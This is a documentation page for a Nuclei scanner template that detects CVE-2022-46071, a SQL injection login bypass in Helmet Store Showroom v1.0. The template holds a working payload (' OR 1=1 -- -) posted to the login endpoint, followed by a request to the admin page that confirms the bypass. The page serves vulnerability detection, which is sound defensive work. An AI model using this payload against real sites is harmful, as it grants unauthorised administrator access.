Skip to content
Nuclei Templates

Helmet Store Showroom v1.0 - SQL Injection

ID: CVE-2022-46071

Severity: critical

Author: Harsh

Tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project

Description

Section titled “Description”

There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.

YAML Source

Section titled “YAML Source”
id: CVE-2022-46071


info:
  name: Helmet Store Showroom v1.0 - SQL Injection
  author: Harsh
  severity: critical
  description: |
    There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/CVE-2022-46071/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46071
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46071
    cwe-id: CWE-89
    epss-score: 0.01454
    epss-percentile: 0.86654
    cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: helmet_store_showroom_site_project
    product: helmet_store_showroom_site
  tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project


http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        username='+OR+1%3D1+--+-&password=1234
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")'
        condition: and
# digest: 4a0a00473045022011ddf4d1323600c528dddb815cc7cb1ef7a234fabb3a5e0b59381f95246152d3022100ed5dd6d994643c89cd3b2cf887d141b5129abf021c15e21e06ce414bbeeb32f7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-46071.yaml"

View on Github